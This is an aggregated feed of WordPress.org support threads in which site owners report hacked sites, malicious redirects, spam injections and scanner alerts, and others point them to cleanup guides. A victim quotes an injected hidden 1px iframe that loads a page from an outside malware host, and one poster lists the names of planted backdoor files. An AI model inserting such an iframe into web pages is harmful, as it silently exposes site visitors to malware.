Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all 3861 articles
Browse latest View live

Jan Dembowski on "I've been hacked!"

$
0
0

Sadly there is no quick fix and this reply is usually the right place to start to get a handle on your hacked installation.

You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Anything less will probably result in the hacker walking straight back into your site again.

Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html


maniaka on "[Plugin: AntiVirus] Suggestion: Scan fake archives"

$
0
0

Fake archives with virus, por scan and option to delete. (2 are real but infected).

wp-includes/post-template.php
wp-includes/Text/class-https.php
wp-includes/https.php
wp-includes/css/class-https.php
wp-admin/css/edit-form-header.php
wp-admin/js/widget.php

https://wordpress.org/plugins/antivirus/

newgeeek on "Help me please from redirecting to another website"

$
0
0

Hi everyone I have a malware in my website who redirect me from my posts to this one ( http://stream-vk.com/?fp=1exag5x6ERtypwEA4dHWjaJyhca8NfiRqZwqfdfPjSaELPHS64Pq0GHKjvBxLFvyq%2FgnA8CXdwg3OR6LJ1R4Nw%3D%3D&prvtof=AL0P8ZW6PL6CIWnYzKliuCNWAFyTQqy%2F337wamLai1QC6Cm4ilVvSBwG6YPUZyn0QzhhUrxwbyDTCLNa0XzGyw%3D%3D&poru=36PV8St63fjD0TUltvXRDZxfawy4%2BXAG2Rgb7zuZWjlzBeFJle%2BSBpGRLOCX6o74b16VwM6n3R75YEMtStrm4g%3D%3D&cifr=1& )

Just the posts redirect to this video I checked the page and the categories and the home page and they didn't redirect

When I checked my website here is the results http://sitecheck.sucuri.net/scanner/?scan=www.fursanalribh.com
" Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://stream-vk.com/validation.php" style="border:0px none;" name="validation" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px"> "
even delete that infected article and noting solved .

plz help me ASAP

searchsaurabhverma on "[Plugin: Plugins] Malware dedected - [Wordfence Alert]"

$
0
0

Alert generated at Saturday 8th of February 2014 at 01:53:02 PM
Critical Problems:

* File contains suspected malware URL: /home/cgm/public_html/wp-content/plugins/revslider/revslider.php
* File contains suspected malware URL: /home/cgm/public_html/wp-content/plugins/revslider/rs-plugin/css/settings.css

Need Help please revert

https://wordpress.org/plugins/plugins/

newgeeek on "Help me please from redirecting to another website"

$
0
0

PLEEEEEEEEEEEEEEEEEEEEEEEEEase help !!!!!!

Wrong_Fairway on "Spam/Blackhat SEO only when shared"

$
0
0

Hello -

Over the past week or so, my site (http://wrongfairway.com) has been showing signs of being hacked, but not in a way I've seen in researching the problem.

Now, I know not to include the code that comes up here, but it's basically a bunch of jibberish about male-enhancement meds at the top of the body of each post. The thing is, accessing the site directly, there's no sign of the spam - it only shows up when I share the post on Facebook (in the little description or preview box below the link) or when it comes across my feedly - the beginning of the post has the long male-enhancement jibberish before getting into the actual post.

A Sucuri sitecheck shows that it is categorized as "site with warnings" and has brought up the mentioned code. What I am wondering is how to deal with this?

Is this something different than other blackhat SEO spam I've seen or should I go through the protocol that Emis has posted to clear out everything?

I'm not great with all this code hacking/dehacking stuff, so any and all help is much appreciated

Andrew Nevins on "Spam/Blackhat SEO only when shared"

$
0
0

should I go through the protocol that Emis has posted to clear out everything?

What protocol is that?

Wrong_Fairway on "Spam/Blackhat SEO only when shared"

$
0
0

My bad. Esmi, not Emis. But this is what I've seen her post for a few different problems....

I'm sorry but you have been hacked. You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Anything less will probably result in the hacker walking straight back into your site again.

Additional Resources:
Hardening WordPress : http://codex.wordpress.org/Hardening_WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html


esmi on "Spam/Blackhat SEO only when shared"

$
0
0

Your site has indeed been hacked. You need to follow the links posted above.

Wrong_Fairway on "Spam/Blackhat SEO only when shared"

$
0
0

What I figured, but was hoping against.

Thanks for the help.

SWalberg on "Spam/Blackhat SEO only when shared"

haasorensen on "[Plugin: Wordfence Security] Wordfence did not find file in themes-folder"

$
0
0

I've found a unwanted file in my wp-content/themes/ folder with the name of signups.php.
It showed my phpinfo and would be able to send out spam-mails.

Wordfence did not find it, even when comparing core files etc.

Is this normal behaviour?

https://wordpress.org/plugins/wordfence/

Eli on "Site hacked despite several Hardening-Tools and gotmls finding nothing..."

$
0
0

It looks like your site is clean. I guess you got it working?

Let em know if you need any more help.

Aloha, Eli

newgeeek on "redirecting problem"

$
0
0

Hi All please Help me I have a malware and Don't know how to delet it from my website http://www.fursanalribh.com
these is a result in Sucuri site
http://sitecheck2.sucuri.net/results/www.fursanalribh.com
I even delete that article but still the malware

the malware redirect my posts to this website
http://stream-vk.com/validation.php
just the post not the pages or the front page
I checked the page source of the articles and find this code :

<div class="hide-text"><iframe src="http://stream-vk.com/validation.php" style="border:0px none;" name="validation" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px"></iframe></div>

please help !!!

esmi on "redirecting problem"

$
0
0

Wordfence on "[Plugin: Wordfence Security] Wordfence did not find file in themes-folder"

Serva on "[Plugin: Wordfence Security] Google Search issue"

$
0
0

I wonder if you can help please. I have a website that I have been running your plugin for months. However today I see in a google search, these results under the web address:

Since payday loansa no other lending process get a quicker generic for viagra generic for viagra option is common but funds right away.An alternative method of ... Google+ page

I have had no warnings of an issue from your plug in and I have always kept it current. I need to protect against this malware as I have seen it before on other websites. When I saw this before (and the reason I used your product to protect from this) it showed the text in google but not in the website, the text also changed so it must be pulling it in. Megaproxy could see the text at the top of the website but when I check with this instance it doesn't see it, so it has developed. I really must stop this from happening, Please help, Thanks D

https://wordpress.org/plugins/wordfence/

Mr.Fitz on "[Plugin: EWWW Image Optimizer] Malware in latest update"

$
0
0

I use EWWW Image Optimizer on my website caregiver-aid.com and am very happy with it. Works great and have had no problems.
Today I receiver this message from WORDFENCE about a critical issue involving EIO.

"File contains suspected malware URL:"

Filename: wp-content/plugins/ewww-image-optimizer/languages/ewww-image-optimizer-ro_RO.mo
Bad URL: http://mediasinfo.ro/
File type: Not a core, theme or plugin file.
Issue first detected: 7 hours 32 mins ago.
Severity: Critical
Status New

This file contains a suspected malware URL listed on Google's list of malware sites. Wordfence decodes base64 when scanning files so the URL may not be visible if you view this file. The URL is: http://mediasinfo.ro/ - More info available at Google Safe Browsing diagnostic page.

Is this a known problem? I don't see anyone else on the support page with this problem.
It looks like a Romania language thing, Since I only do business in U.S. can I safely delete this file without harming the plugin?

Thanks for your time, Greg

https://wordpress.org/plugins/ewww-image-optimizer/

nosilver4u on "[Plugin: EWWW Image Optimizer] Malware in latest update"

$
0
0

The url in question is the website of the individual (or team) that does the Romanian translations for the plugin. I don't know Romanian, but their website does not look like it distributes malware. I've sent an email to them to try and get more information, but I suspect it may actually be the ad network they use that was infected, rather than their actual website.

You can delete the file in question, or leave it, it isn't going to hurt anything, since that url never gets displayed anywhere. It also won't break anything, since you are not using the Romanian translation.

Mr.Fitz on "[Plugin: EWWW Image Optimizer] Malware in latest update"

$
0
0

I've deleted this file and as you suggested there seems to be no further problems. Wordfence is now happy.

Thank you for your quick response.

Great plugin.

Greg

Viewing all 3861 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>